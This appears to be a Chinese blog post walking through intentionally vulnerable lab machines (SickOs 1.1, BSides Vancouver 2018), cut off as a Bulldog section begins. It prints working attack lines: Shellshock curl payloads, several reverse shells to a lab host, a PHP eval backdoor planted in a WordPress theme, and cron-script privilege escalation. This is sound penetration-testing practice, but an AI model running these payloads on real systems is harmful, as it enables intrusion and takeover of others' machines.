L1aoのblog

无聊的世界因为我又添了一顿累赘

0%

靶机练习

Posted on Edited on
靶机练习

靶机

SickOs 1.1

发现主机

  • netdiscover

  • arp-scan -l

  • nmap -sP 192.168.221.1/24

  • nmap -sS -sV -T4 -A -p- -Pn 192.168.221.134

扫到网络代理

1
2
3
4
5
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved

8080/tcp closed http-proxy

直接访问8080被拒绝,挂他代理访问

image-20211127132404901

扫描漏洞

  • nikto 扫一波漏洞 nikto -h 192.168.221.134 -useproxy http://192.168.221.134:3128

  • socks5://127.0.0.1:7890

  • 可以打cve也可以打web后台

  • image-20211127143409260

  • Apache mod_cgi - ‘Shellshock’ Remote Command Injection - Linux remote Exploit (exploit-db.com)

    1
    2
    3
    python exp.py payload=reverse rhost=192.168.221.134 lhost=172.17.112.3 lport=11122 proxy=192.168.221.134:3128 pages=/cgi-bin/status/

    没打通

    手打

    1
    2
    3
    4
    5
    curl -v --proxy 192.168.221.134:3128 \
      http://192.168.221.134/cgi-bin/status  -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit"
      
    curl -v --proxy 192.168.221.134:3128 \
      192.168.221.134/cgi-bin/status -H "Referer: () { test;}; 0<&28-;exec 28<>/dev/tcp/172.17.112.3/11122;/bin/sh <&28 >&28 2>&28"

    image-20211127144334077

getshell

默认地址Wolf CMS:http://192.168.221.134/wolfcms/?/admin

默认密码admin/admin

上传大马 登录大马 查看配置文件 有密码

image-20211127142057844

image-20211127142242902

尝试登录 sickos 密码john@123

image-20211127142525106

image-20211127142731673

image-20211127143005841

  • cat /etc/cron.d/automate 查看定时任务
  • /var/www/connect.py
  • 写反弹shell进去可以弹root出来

成功提权 结束

image-20211127143044193

BSides-Vancouver-2018-Workshop

扫描服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
 nmap -sS -sV -T4 -A -p- -Pn 192.168.221.135
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-27 15:08 CST
Nmap scan report for bogon (192.168.221.135)
Host is up (0.0010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 65534    65534        4096 Mar 03  2018 public
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.221.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
|   2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_  256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/27%OT=21%CT=1%CU=32261%PV=Y%DS=2%DC=T%G=Y%TM=61A1D9
OS:8D%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OP
OS:S(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST
OS:11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=C95%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT     ADDRESS
1   0.16 ms LAPTOP-3Q0LGQ5O.mshome.net (172.17.112.1)
2   0.63 ms bogon (192.168.221.135)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 FTP server status:
|      Connected to 192.168.221.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
允许匿名登录
文件users.txt.bk:
abatchy
john
mai
anne
doomguy

image-20211127154916721

写马

appearance -> Edit Themes ->header.php

第一行写入

file_put_contents(‘./aaa.php’,’<?php eval($_GET[1]);’);

保存

访问aaa.php

http://192.168.221.135/backup_wordpress/aaa.php?1=system('ls');

得到权限

拿权

反弹shell

1
2
3
bash -c "bash -i >& /dev/tcp/172.17.112.3/11133 0>&1"
nc 172.17.112.3 11133
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.17.112.3 11222 >/tmp/f

也可以传个小马,连上蚁剑,,,,拉个大马进去 大马反弹shell 进入交互模式

1
python -c 'import pty;pty.spawn("/bin/bash")' //交互

提权

查找每个用户文件,和浏览各目录文件,发现位于 /usr/local/bin/cleanup 文件,其权限是777,查看内容 为:

#!/bin/sh

rm -rf /var/log/apache2/* # Clean those damn logs!!

修改内容为反弹shell

image-20211127161452054

image-20211127161442468

image-20211127161555727

思路

没有入手点就爆破密码用户,wpscan

熟悉wordpress提权方式

熟悉反弹shell的姿势

Bulldog

主机发现

netdiscover -r 192.168.0.0/24